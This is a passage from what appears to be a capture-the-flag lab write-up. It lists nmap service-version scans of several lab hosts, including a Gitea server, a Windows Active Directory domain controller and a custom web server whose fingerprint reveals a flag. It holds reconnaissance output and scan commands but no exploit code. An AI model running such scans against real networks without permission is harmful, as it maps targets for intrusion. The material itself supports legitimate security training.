SF:s:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2027\x20May\x202024\x2014:01:53\x20G SF:MT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme- SF:auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device SF:-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20c SF:up\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:app SF:lication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYS SF:IsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfd SF:XJsIjoiaHR0cDovLzE5Mi4xNjguMC44MTozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRw SF:Oi8vMTkyLjE2OC4wLjgxOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWF SF:nZS9wbmciLCJzaXp")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\ SF:r\n400\x20Bad\x20Request")%r(HTTPOptions,1D7,"HTTP/1\.0\x20405\x20Metho SF:d\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20HE SF:AD\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20GE SF:T\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x20no SF:-transform\r\nSet-Cookie:\x20i_like_gitea=b46ae29f04d7958e;\x20Path=/;\ SF:x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=apn2X3-a9aEDF3EHdQ SF:dqP2Kq7u06MTcxNjgxODUxODY5MzQwMjI3OA;\x20Path=/;\x20Max-Age=86400;\x20H SF:ttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20 SF:Mon,\x2027\x20May\x202024\x2014:01:58\x20GMT\r\nContent-Length:\x200\r\ SF:n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4 SF:00\x20Bad\x20Request"); MAC Address: BC:24:11:E7:C7:CF (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds ``` |port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) | | 3000 | http | Gitea | --- #### nmap 192.168.0.100 ```bash PORT STATE SERVICE VERSION 53/tcp open domain? 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 54045/tcp open msrpc Microsoft Windows RPC 54053/tcp open msrpc Microsoft Windows RPC 54065/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=5/27%Time=66549389%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); MAC Address: BC:24:11:99:91:F7 (Unknown) Service Info: Host: WIN-3OQBLK21T8G; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 246.72 seconds ``` |port | protocol | service | |---|---|---| | 53 | domain? | - | | 88 | kerberos-sec | Microsoft Windows Kerberos (server time: 2024-05-27 21:06:58Z) | 135 | msrpc | Microsoft Windows RPC | | 139 | netbios-ssn | Microsoft Windows netbios-ssn | | 389 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) | | 445 | microsoft-ds? | | 464 | kpasswd5? | | 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | | 636 | tcpwrapped | | 3268 | ldap | Microsoft Windows Active Directory LDAP (Domain: bubble.dev0., Site: Default-First-Site-Name) | | 3269 | tcpwrapped | | 3389 | ms-wbt-server Microsoft Terminal Services | | 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | | 9389 | mc-nmf | .NET Message Framing | | 49664 | msrpc | Microsoft Windows RPC | | 49669 | msrpc | Microsoft Windows RPC | | 49671 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | | 54045 | msrpc | Microsoft Windows RPC | | 54053 | msrpc | Microsoft Windows RPC | | 54065 | msrpc | Microsoft Windows RPC | --- #### nmap 192.168.0.101 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.101 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:57 UTC Nmap scan report for 192.168.0.101 Host is up (0.00028s latency). Not shown: 64998 filtered ports PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) MAC Address: BC:24:11:4F:8B:17 (Unknown) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 125.18 seconds ``` |port | protocol | service | |---|---|---| | 3389 | ms-wbt-server | Microsoft Terminal Services | | 5985 | http | Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | --- #### Nmap 192.168.0.123 ```bash nmap -sV 192.168.0.123 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-29 08:11 UTC Nmap scan report for 192.168.0.123 Host is up (0.000010s latency). Not shown: 64997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Bubble Web Server 3.0 8080/tcp open http Apache httpd 2.4.52 ((Ubuntu)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.80%I=7%D=5/29%Time=6656E320%P=x86_64-pc-linux-gnu%r(NULL SF:,1CD,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\. SF:0\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n\ndvztjmff\x20laxhummx\x20qlxzpnsl\x20rqylvzkb\x20xjugxzni\x20blqvzcup SF:\x20qurhhjty\x20btlxuxar\x20guzdvnlw\x20ydtzinry\x20\n\n\njihqtc SF:qw\x20xbvsyvlg\x20rllmyzky\x20efxmvome\x20yuxtypqw\x20tlqthbaa\x20mnpmo SF:bkt\x20hkfeaskz\x20ohumzkks\x20yclhenhs\x20\n\n\ndwhryrkh\x20dsn SF:ekxfa\x20hzogmzak\x20bnrhbycg\x20xjxxckgg\x20ctmoqroz\x20scfedhoh\x20vf SF:qygsed\x20bdagpgmr\x20bahtrxtj\x20\n\n</body>\n</html>\n")%r(TLSSessionReq, SF:216,"HTTP/1\.1\x20200\x20OK\nServer:\x20Bubble\x20Web\x20Server\x203\.0 SF:\nContent-Type:\x20text/html\n\n<!DOCTYPE\x20html>\n<html>\n<body>\n<h1 SF:>FLAG{8uBb1es3v3rywh3re}</h1>\n\nrta\x20jie\x20pwf\x20snv\x20qcy\x20 SF:jqb\x20\n\n\najg\x20ivs\x20wiu\x20pqu\x20bhq\x20bsy\x20\n\n< SF:p>\nhjx\x20nbm\x20itq\x20icj\x20jes\x20rmq\x20\n\n\nmly\x20gaq\x SF:20cbz\x20ser\x20tmb\x20sze\x20\n\n\nejy\x20vra\x20gbh\x20asv\x20 SF:qeg\x20rmj\x20\n\n\nhrm\x20jjt\x20aef\x20dwg\x20idp\x20gag\x20\n SF:\n\nigj\x20pge\x20lxk\x20tqx\x20ezo\x20tiz\x20\n\n\nmlg\x SF:20toc\x20bwf\x20qeh\x20ynn\x20kcw\x20\n\n\nopt\x20yjl\x20xpk\x20 SF:nit\x20nue\x20vpu\x20\n\n\nzqt\x20hix\x20ohm\x20ctr\x20yhg\x20th SF:r\x20\n\n</body>\n</html>\n"); MAC Address: BC:24:11:A8:99:68 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` --- #### nmap 192.168.0.200 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.200 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:54 UTC Nmap scan report for 192.168.0.200 Host is up (0.000085s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) 9999/tcp open http Apache httpd 2.4.52 ((Ubuntu)) MAC Address: BC:24:11:07:76:DF (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.36 seconds ``` | port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 9.6p1 Ubuntu 3ubuntu13 (Ubuntu Linux; protocol 2.0) | | 9999 | http | Apache httpd 2.4.52 | ---